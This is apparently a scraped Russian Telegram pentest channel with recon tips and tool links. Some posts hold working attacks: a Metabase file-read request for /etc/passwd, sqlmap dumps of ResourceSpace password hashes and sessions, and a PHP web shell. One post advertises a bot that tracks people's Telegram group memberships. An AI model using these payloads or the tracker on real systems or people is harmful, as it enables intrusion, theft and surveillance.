Вы заметили резкий рост количества атак Ransomware группировок в этом году? ИБ специалисты говорят, что такой тренд сохраниться еще надолго. Кроме пробива инфраструктуры и локинга, элитные вымогательские группировки используют социальную инженерию (СИ), в качестве самого эффективного метода давления.
Прокаченные навыки СИ позволяет оказывать на компании сильнейшее давление, использовать СМИ в своих целях, и всегда оборачивать переговоры по выкупу в свою пользу. Каждый ИБ-специалист, вне зависимости от цвета шляпы, должен разбираться в человеческой психологии, понимать основы манипуляции, и уметь выстраивать правильную стратегию переговоров c контрагентами.
Рекомендую заглянуть на известный Telegram канал @Social_engineering. Автор собирает всё самое вкусное и полезное по социальной инженерии. А в комплекте с его материалами по OSINT, вам открываются еще большие перспективы.
Прокаченные навыки СИ позволяет оказывать на компании сильнейшее давление, использовать СМИ в своих целях, и всегда оборачивать переговоры по выкупу в свою пользу. Каждый ИБ-специалист, вне зависимости от цвета шляпы, должен разбираться в человеческой психологии, понимать основы манипуляции, и уметь выстраивать правильную стратегию переговоров c контрагентами.
Рекомендую заглянуть на известный Telegram канал @Social_engineering. Автор собирает всё самое вкусное и полезное по социальной инженерии. А в комплекте с его материалами по OSINT, вам открываются еще большие перспективы.
🔎 Поиск скрытых сервисов через виртуальные хосты
Виртуальный хостинг — вид хостинга, при котором множество веб-сайтов расположено на одном веб-сервере.
Во время фазы разведки, поиск виртуальных хостов может помочь расширить цель, обнаружив старый или устаревший код, а также выявить скрытые сервисы и/или админ панели.
Используйте Burp Intruder или ffuf для каждого найденного вами домена и выполните фаззинг виртуальных хостов с помощью команд:
или
#web #vhost #recon
Виртуальный хостинг — вид хостинга, при котором множество веб-сайтов расположено на одном веб-сервере.
Во время фазы разведки, поиск виртуальных хостов может помочь расширить цель, обнаружив старый или устаревший код, а также выявить скрытые сервисы и/или админ панели.
Используйте Burp Intruder или ffuf для каждого найденного вами домена и выполните фаззинг виртуальных хостов с помощью команд:
ffuf -c -u https://target.com -H "Host: FUZZ" -w vhost_wordlist.txtили
ffuf -c -u https://target.com -H "Host: FUZZ.target.com" -w vhost_wordlist.txt#web #vhost #recon
🔖 Быстрое сканирование сайта с помощью Google дорков
Данный OSINT проект позволяет найти на веб-сайте уязвимые страницы и файлы с конфиденциальной информацией, используя 45 типов Google Dorks.
Инструмент может находить популярные админ-панели, распространённые типы файлов и Path Traversal.
Ссылка на GitHub
#web #dork #recon #google
Данный OSINT проект позволяет найти на веб-сайте уязвимые страницы и файлы с конфиденциальной информацией, используя 45 типов Google Dorks.
Инструмент может находить популярные админ-панели, распространённые типы файлов и Path Traversal.
Ссылка на GitHub
#web #dork #recon #google
Бот TgScanRobot должен быть в арсенале любого OSINT-исследователя, HR-специалиста, хакера и просто любопытного человека. Бот позволяет узнать, в каких телеграм-группах, состоит интересующий вас человек.
На данный момент в базе данных бота содержится более миллиона групп и более полутора миллиардов связей пользователей c группами.
База бота постоянно пополняется. Бот ищет упоминания групп в различных интернет-источниках, затем заходит в новые группы и сохраняет список участников группы. Бот ежедневно обновляет списки участников уже известных ему групп.
@TgScanRobot
#Реклама
На данный момент в базе данных бота содержится более миллиона групп и более полутора миллиардов связей пользователей c группами.
База бота постоянно пополняется. Бот ищет упоминания групп в различных интернет-источниках, затем заходит в новые группы и сохраняет список участников группы. Бот ежедневно обновляет списки участников уже известных ему групп.
@TgScanRobot
#Реклама
⛓ От страницы phpinfo до критических уязвимостей и RCE
Я думаю многим попадалась страница
#web #rce #php #symfony
Читать статью
Я думаю многим попадалась страница
phpinfo, но вы не всегда знали, что можно получить с помощью её секретов. Данная статья раскроет один из возможных способов эксплуатации.#web #rce #php #symfony
Читать статью
Telegraph
От страницы phpinfo до критических уязвимостей и RCE
Данная статья является переводом и ведется со слов автора. Оригинал тут. Symfony - это набор компонентов PHP и PHP-фреймворк для создания веб-приложений, API, микросервисов и веб-сервисов. История Во время охоты на ошибки я обнаружил страницу phpinfo, которая…
🔥1🤔1
📌 Инструмент для сбора поддоменов и поиска уязвимостей
Ещё один неплохой инструмент для поиска уязвимостей, под названием Garud.
Он позволяет собирать поддомены, проверять возможность их захвата, а также собирать URL адреса и находить распространённые уязвимости, такие как XSS, SSTI, SSRF, SQLi и другие.
Схема работы инструмента представлена на скрине ниже.
Ссылка на GitHub
#web #soft
Ещё один неплохой инструмент для поиска уязвимостей, под названием Garud.
Он позволяет собирать поддомены, проверять возможность их захвата, а также собирать URL адреса и находить распространённые уязвимости, такие как XSS, SSTI, SSRF, SQLi и другие.
Схема работы инструмента представлена на скрине ниже.
Ссылка на GitHub
#web #soft
📁 Быстрый поиск конфиденциальных данных в SMB
Для выполнения этой цели, можно использовать SMBSR. Это скрипт принимает адрес или список хостов, находит все открытые службы SMB (445) и пытается аутентифицироваться.
Если аутентификация прошла успешно, то все папки посещаются рекурсивно, в поисках секретов.
Для сканирования портов SMB используется модуль masscan. Интересные ключевые слова, которые должен искать инструмент, определяются в командной строке.
Ссылка на GitHub
#redteam #smb #leak
Для выполнения этой цели, можно использовать SMBSR. Это скрипт принимает адрес или список хостов, находит все открытые службы SMB (445) и пытается аутентифицироваться.
Если аутентификация прошла успешно, то все папки посещаются рекурсивно, в поисках секретов.
Для сканирования портов SMB используется модуль masscan. Интересные ключевые слова, которые должен искать инструмент, определяются в командной строке.
Ссылка на GitHub
#redteam #smb #leak
Forwarded from Social Engineering
📚 Этичный хакинг и информационная безопасность. Подборка бесплатных курсов.
• Бесплатный курс по взлому от HackerOne;
https://www.youtube.com/
• Базовый курс по Web Security, от Стэнфордского университета (актуальный на 2021 год);
https://web.stanford.edu/class/cs253/
• Зеркало интернета. Курс для Социальных инженеров и специалистов в области #OSINT:
https://xn--r1a.website/Social_engineering/1224
• Введение в реверсинг с нуля используя IDA PRO;
https://yutewiyof.gitbook.io/intro-rev-ida-pro/chast-01
• Android App Reverse Engineering 101;
https://maddiestone.github.io/AndroidAppRE/index.html
• Introduction to Computer Networks for Non Techies:
https://www.youtube.com/watch?v=aFzxweQ_iMk
• Cyber Security Hands-on: Complete Network Security A-Z
https://www.youtube.com/watch?v=HLrJlsxomks
• Хакинг с #Metasploit. RU.
https://xn--r1a.website/S_E_Reborn/811
• Бесплатные курсы. Сетевые технологии.
https://www.asozykin.ru/courses/networks_online
https://www.youtube.com/
https://xn--r1a.website/S_E_Reborn/1234
• Курс: Cobalt Strike. Переведено на RU.
https://xn--r1a.website/S_E_Reborn/10
• Red Hat Linux Certified System Admin SA1 RHEL7
https://www.youtube.com/watch?v=0yK5H6boJRE
• Полный курс по этичному хакингу с Nmap;
https://xn--r1a.website/Social_engineering/846
• Полный курс по WireShark;
https://xn--r1a.website/S_E_Reborn/229
• Database hacking и network protocols;
https://xn--r1a.website/Social_engineering/1066
• Start Kali Linux, Ethical Hacking and Penetration Testing!
https://www.youtube.com/watch?v=_As-rx86f-4
‼️ Дополнительную информацию ты можешь найти по хештегам #Курс и #Книга. Твой S.E.
🖖🏻 Приветствую тебя user_name.💬 Я собрал для тебя подборку бесплатных курсов на любой вкус. Описание сможешь найти под названием каждого курса, перейдя по нужной ссылке.
• Бесплатный курс по взлому от HackerOne;
https://www.youtube.com/
• Базовый курс по Web Security, от Стэнфордского университета (актуальный на 2021 год);
https://web.stanford.edu/class/cs253/
• Зеркало интернета. Курс для Социальных инженеров и специалистов в области #OSINT:
https://xn--r1a.website/Social_engineering/1224
• Введение в реверсинг с нуля используя IDA PRO;
https://yutewiyof.gitbook.io/intro-rev-ida-pro/chast-01
• Android App Reverse Engineering 101;
https://maddiestone.github.io/AndroidAppRE/index.html
• Introduction to Computer Networks for Non Techies:
https://www.youtube.com/watch?v=aFzxweQ_iMk
• Cyber Security Hands-on: Complete Network Security A-Z
https://www.youtube.com/watch?v=HLrJlsxomks
• Хакинг с #Metasploit. RU.
https://xn--r1a.website/S_E_Reborn/811
• Бесплатные курсы. Сетевые технологии.
https://www.asozykin.ru/courses/networks_online
https://www.youtube.com/
https://xn--r1a.website/S_E_Reborn/1234
• Курс: Cobalt Strike. Переведено на RU.
https://xn--r1a.website/S_E_Reborn/10
• Red Hat Linux Certified System Admin SA1 RHEL7
https://www.youtube.com/watch?v=0yK5H6boJRE
• Полный курс по этичному хакингу с Nmap;
https://xn--r1a.website/Social_engineering/846
• Полный курс по WireShark;
https://xn--r1a.website/S_E_Reborn/229
• Database hacking и network protocols;
https://xn--r1a.website/Social_engineering/1066
• Start Kali Linux, Ethical Hacking and Penetration Testing!
https://www.youtube.com/watch?v=_As-rx86f-4
‼️ Дополнительную информацию ты можешь найти по хештегам #Курс и #Книга. Твой S.E.
👍3
📲 Полезные ресурсы по пентесту iOS приложений
Блоги:
▫️ iOS Security
▫️ Basic iOS Apps Security Testing lab
▫️ IOS application security – Setting up a mobile pentesting platform
▫️ Collection of the most common vulnerabilities found in iOS applications
▫️ Mobile Security Testing Guide (MSTG)
▫️ Dynamic analysis of iOS apps without Jailbreak
▫️ iOS Application Injection
▫️ A Run-Time Approach For Penetration Testing Of IOS Apps Part-I
▫️ A Run-Time Approach For Pen-Testing IOS Applications Part-II (Objection In Action)
▫️ A completely free, open source and online course about Reverse Engineering iOS Applications
▫️ Готовим iOS-устройство к пентесту
Лабы:
▫️ Damn Vulnerable iOS App (DVIA)
▫️ Damn Vulnerable iOS App (DVIA) v2
▫️ iPhone security labs
▫️ Lab Material for iOS Attack & Defense Course
Инструменты:
▫️ Most usable tools for iOS penetration testing
#ios
Блоги:
▫️ iOS Security
▫️ Basic iOS Apps Security Testing lab
▫️ IOS application security – Setting up a mobile pentesting platform
▫️ Collection of the most common vulnerabilities found in iOS applications
▫️ Mobile Security Testing Guide (MSTG)
▫️ Dynamic analysis of iOS apps without Jailbreak
▫️ iOS Application Injection
▫️ A Run-Time Approach For Penetration Testing Of IOS Apps Part-I
▫️ A Run-Time Approach For Pen-Testing IOS Applications Part-II (Objection In Action)
▫️ A completely free, open source and online course about Reverse Engineering iOS Applications
▫️ Готовим iOS-устройство к пентесту
Лабы:
▫️ Damn Vulnerable iOS App (DVIA)
▫️ Damn Vulnerable iOS App (DVIA) v2
▫️ iPhone security labs
▫️ Lab Material for iOS Attack & Defense Course
Инструменты:
▫️ Most usable tools for iOS penetration testing
#ios
📒 Анализируем доступный access.log
Если вы нашли доступный журнал
Для этого можно использовать ffuf и выполнить:
Ну а если не хочется просматривать все вручную, то можно запустить Burp Suite с любым расширением для пассивного поиска секретов (например, SecretFinder или Burp Bounty) и пустить полученные результаты через Burp, указав параметр
#web #leak
Если вы нашли доступный журнал
access.log, то можно проанализировать его содержимое и просмотреть адреса с кодом ответа 200, так как это может привести к интересным находкам и утечкам.Для этого можно использовать ffuf и выполнить:
cat access.log | grep " 200 " | cut -d'"' -f2 | cut -d' ' -f2 | sort -u | ffuf -mc 200 -w - -u "https://example.comFUZZНу а если не хочется просматривать все вручную, то можно запустить Burp Suite с любым расширением для пассивного поиска секретов (например, SecretFinder или Burp Bounty) и пустить полученные результаты через Burp, указав параметр
-replay-proxy:cat access.log | grep " 200 " | cut -d'"' -f2 | cut -d' ' -f2 | sort -u | ffuf -mc 200 -w - -u "https://example.comFUZZ" -replay-proxy http://127.0.0.1:8080#web #leak
🎐 Находим SSRF параметры с помощью scant3r
Поиск SSRF в скрытых параметрах. Для большей эффективности можно объединить вместе с инструментами или словарям из данной статьи.
P.S. Thx @w3b_pwn
#web #ssrf
Читать статью
Поиск SSRF в скрытых параметрах. Для большей эффективности можно объединить вместе с инструментами или словарям из данной статьи.
P.S. Thx @w3b_pwn
#web #ssrf
Читать статью
Telegraph
Находим SSRF параметры с помощью scant3r
Здравствуйте, это небольшой блог о том, как найти SSRF параметры у вашей цели с помощью scant3r любым http методом и с поддержкой JSON. Требования python 3.6+ pip OAST Host (burp collaborator или interactsh.com) Установка >>> git clone https://github.com…
🔦 Быстрый и настраиваемый сканер уязвимостей для JIRA
JIRA - это коммерческая система отслеживания проблем, разработанная Atlassian, которая позволяет отслеживать ошибки и гибко управлять проектами. На днях на гитхабе появился новый сканер уязвимостей написанный на Python для JIRA, под названием Jira-Lens.
Этот инструмент выполняет более 25 проверок, включая CVE и угрозы раскрытия информации в предоставленном экземпляре JIRA.
Чтобы немного автоматизировать, можно с помощью Nuclei определить какие хосты относятся к JIRA и просканировать их все:
Ссылка на GitHub
JIRA - это коммерческая система отслеживания проблем, разработанная Atlassian, которая позволяет отслеживать ошибки и гибко управлять проектами. На днях на гитхабе появился новый сканер уязвимостей написанный на Python для JIRA, под названием Jira-Lens.
Этот инструмент выполняет более 25 проверок, включая CVE и угрозы раскрытия информации в предоставленном экземпляре JIRA.
Чтобы немного автоматизировать, можно с помощью Nuclei определить какие хосты относятся к JIRA и просканировать их все:
cat alive.domains | nuclei -c 50 -silent -t ~/nuclei-templates/exposed-panels/jira-detect.yaml | awk '{print $6}' | anew jira.domains && python3 Jira-Lens.py -f jira.domains
#web #jira #toolsСсылка на GitHub
⛓ Сбор поддоменов с помощью перестановок и комбинаций
Чтобы найти еще больше поддоменов для атаки, мы можем сгенеририровать комбинации или перестановки уже известных нам поддоменов.
В этом методе нам также нужен небольшой список слов, который содержал бы такие распространенные слова, как
Например, давайте рассмотрим поддомен
#web #recon
Чтобы найти еще больше поддоменов для атаки, мы можем сгенеририровать комбинации или перестановки уже известных нам поддоменов.
В этом методе нам также нужен небольшой список слов, который содержал бы такие распространенные слова, как
mail, internal, dev, demo, accounts, ftp, admin (похоже на брутфорс поддоменов, но требуется меньше слов). Список таких слов можно найти например здесь.Например, давайте рассмотрим поддомен
dev.example.com. Мы можем сгенерировать различные вариации перестановок этого поддомена (смотри скрин ниже) с помощью инструмента gotator:gotator -sub domains.txt -perm permutations_list.txt -depth 3 -numbers 10 | uniq > permutations.txt
Теперь, когда мы составили огромный список всех возможных поддоменов, пришло время зарезолвить их и узнать, существуют ли они на самом деле. Для этого мы будем использовать puredns:puredns resolve permutations.txt -r resolvers.txt
Где взять актуальный список резолверов я расказывал вот тут.#web #recon
👍2
🧨 История невероятного слепого удаленного выполнения кода (RCE)
Фаззинг, поиск скрытых параметров и эксплуатация слепого RCE через DNS запросы в Burp Collaborator.
#web #rce
Читать статью
Фаззинг, поиск скрытых параметров и эксплуатация слепого RCE через DNS запросы в Burp Collaborator.
#web #rce
Читать статью
Telegraph
История невероятного слепого удаленного выполнения кода (RCE)
Данная статья является переводом и ведется со слов автора. Оригинал тут. В этом блоге объясняется, как я обнаружил уязвимость слепого удаленного выполнения кода (RCE) и как она была использована. Итак, что же такое Blind RCE? Уязвимость Blind RCE возникает…
📖 Произвольное чтение файлов в Metabase (CVE-2021-41277)
Metabase - это платформа для анализа данных с открытым исходным кодом. В уязвимых версиях была обнаружена проблема безопасности с настраиваемой картой GeoJSON приводящая к LFI. Более подробно тут.
PoC:
Шаблон для Nuclei есть по ссылке. Уязвимые хосты можно поискать тут:
Дорк для Shodan
Дорк для Fofa
#web #cve
Metabase - это платформа для анализа данных с открытым исходным кодом. В уязвимых версиях была обнаружена проблема безопасности с настраиваемой картой GeoJSON приводящая к LFI. Более подробно тут.
PoC:
GET /api/geojson?url=file:/etc/passwd HTTP/1.1Шаблон для Nuclei есть по ссылке. Уязвимые хосты можно поискать тут:
Дорк для Shodan
Дорк для Fofa
#web #cve
🏮 0day LPE в установщике Windows
Работает для всех версий установщика Windows, включая Windows 11 и Server 2022 с ноябрьским патчем.
Уязвимость была обнаружена при анализе патча для CVE-2021-41379. Мелкомягкие не смогли корректно исправить уязвимость, что в итоге привело к появлению обхода их патча.
Ссылка на эксплоит
#redteam #windows #lpe
Работает для всех версий установщика Windows, включая Windows 11 и Server 2022 с ноябрьским патчем.
Уязвимость была обнаружена при анализе патча для CVE-2021-41379. Мелкомягкие не смогли корректно исправить уязвимость, что в итоге привело к появлению обхода их патча.
Ссылка на эксплоит
#redteam #windows #lpe
🖇 Сканирование уязвимостей в Nmap с помощью NSE скриптов
Скрипты NSE Nmap позволяют не только выполнять задачи сканирования портов, но и обнаруживать CVE за считанные секунды.
Три наиболее популярных скрипта для обнаружения уязвимостей/CVE, найденных в Nmap NSE - это nmap-vulners, vulscan и vuln, которые позволят вам обнаруживать соответствующую информацию CVE на удаленных или локальных хостах.
Установка vulscan
Запуск Vuln:
Аналогичным образом используются и другие скрипты. Про все доступные в Nmap скрипты, а также про их удобный поиск я уже рассказывал ранее.
#redteam #recon #cve
Скрипты NSE Nmap позволяют не только выполнять задачи сканирования портов, но и обнаруживать CVE за считанные секунды.
Три наиболее популярных скрипта для обнаружения уязвимостей/CVE, найденных в Nmap NSE - это nmap-vulners, vulscan и vuln, которые позволят вам обнаруживать соответствующую информацию CVE на удаленных или локальных хостах.
Установка vulscan
git clone https://github.com/scipag/vulscan scipag_vulscan
ln -s `pwd`/scipag_vulscan /usr/share/nmap/scripts/vulscan
Запуск vulscannmap -sV --script=vulscan/vulscan.nse www.example.com
Установка nmap-vulnerscd /usr/share/nmap/scripts/
git clone https://github.com/vulnersCom/nmap-vulners.git
Запуск nmap-vulnersnmap --script nmap-vulners/ -sV 11.22.33.44
Запуск Vuln:
nmap -Pn --script vuln 192.168.1.105Аналогичным образом используются и другие скрипты. Про все доступные в Nmap скрипты, а также про их удобный поиск я уже рассказывал ранее.
#redteam #recon #cve
👍1
💉 Множественные уязвимости в ResourceSpace (CVE-2021-41765)
Уязвимость в ResourceSpace <=9.5 позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольные SQL-команды, что может приводить к другим уязвимостям.
Это позволяет злоумышленникам раскрыть полное содержимое базы данных, включая файлы cookie сеанса пользователей и выполнять произвольные команды на сервере.
SQLi
От SQLi до прав админа
Дампим имена, хэши паролей и куки, для получения административного доступа:
RCE
В приложении есть функция загрузки плагинов, поэтому можно загрузить плагин, содержащий веб-оболочку:
Упакуйте в
Для получения более подробной информации смотрите тут.
#web #sqli #rce
Уязвимость в ResourceSpace <=9.5 позволяет удаленным неаутентифицированным злоумышленникам выполнять произвольные SQL-команды, что может приводить к другим уязвимостям.
Это позволяет злоумышленникам раскрыть полное содержимое базы данных, включая файлы cookie сеанса пользователей и выполнять произвольные команды на сервере.
SQLi
sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysqlОт SQLi до прав админа
Дампим имена, хэши паролей и куки, для получения административного доступа:
sqlmap --cookie 'upload_share_active=1' -u "http://127.0.0.1/pages/edit_fields/9_ajax/add_keyword.php?k=abcd" -p k --level=5 --risk3 --dbs --mysql --dump -D resourcespace -T user -C username,password,sessionRCE
В приложении есть функция загрузки плагинов, поэтому можно загрузить плагин, содержащий веб-оболочку:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>%Упакуйте в
.tar.gz, затем переименуйте в .rspДля получения более подробной информации смотрите тут.
#web #sqli #rce
🔥1
🕸 Веб-службы на нестандартных портах
Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.
Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:
#web #recon
Чтобы находить больше целей для поиска уязвимостей, следует проверять не только стандартные веб порты (80 и 443), но и нестандартные, такие как 8080, 10000, 8443 и другие, на которых могут располагаться веб-службы.
Если провести некоторый анализ Shodan и имеющихся там веб-служб, работающих на нестандартных портах, то можно выделить некоторый список наиболее распространённых портов, которые следует проверять во время фазы разведки:
httpx -l targets.list -p 8080,10000,20000,2222,7080,9009,7443,2087,2096,8443,4100,2082,2083,2086,9999,2052,9001,9002,7000,7001,8082,8084,8085,8010,9000,2078,2080,2079,2053,2095,4000,5280,8888,9443,5800,631,8000,8008,8087,84,85,86,88,10125,9003,7071,8383,7547,3434,10443,8089,3004,81,4567,7081,82,444,1935,3000,9998,4433,4431,4443,83,90,8001,8099,80,300,443,591,593,832,981,1010,1311,2480,3128,3333,4243,4711,4712,4993,5000,5104,5108,6543,7396,7474,8014,8042,8069,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8500,8834,8880,8983,9043,9060,9080,9090,9091,9200,9800,9981,12443,16080,18091,18092,20720,28017 -o livesites.result#web #recon
💻 Управляем своим VPS через Telegram
Увидел на GitHub небольшой python скрипт, который позволяет выполнять команды на вашем сервере и получать выходные данные непосредственно в Telegram.
Это также может быть очень полезно при выполнении рекона или при выполнении длительных команд, которые требуют взаимодействия с пользователем.
Ссылка на GitHub
#bash #python #tools
Увидел на GitHub небольшой python скрипт, который позволяет выполнять команды на вашем сервере и получать выходные данные непосредственно в Telegram.
Это также может быть очень полезно при выполнении рекона или при выполнении длительных команд, которые требуют взаимодействия с пользователем.
Ссылка на GitHub
#bash #python #tools
YouTube
Automate Telegram (Acess VPS within Telegram)
Small python code which can be handy while you are using telegram and dont want to use vps again and again.
By configuring the code in your VPS,
You can execute commands and get your output within telegram.
It can also be very useful in performing Recon.…
By configuring the code in your VPS,
You can execute commands and get your output within telegram.
It can also be very useful in performing Recon.…
🕵️♂️ Отслеживание новых целей для атаки
Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.
Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:
#web #tools #recon
Каждое сканирование, которое вы выполняете с помощью amass, автоматически сохраняется на компьютере, на котором вы его запустили. Затем, если вы снова запустите ту же проверку, amass будет отслеживать любые изменения, произошедшие с момента вашего последнего сканирования.
Наиболее очевидный способ использовать эту функцию-определить, какие поддомены появились с момента вашего последнего сканирования. Например, вы выполняли ранее сканирование:
amass enum -d vimeo.com
Сейчас прошло несколько месяцев и если снова выполнить это сканирование, а затем прописатьamass track -d vimeo.com
то мы сможем увидеть все, что изменилось за эти месяцы. Это позволяет нам сосредоточить внимание на свежих целях, которые с большей вероятностью будут уязвимы.#web #tools #recon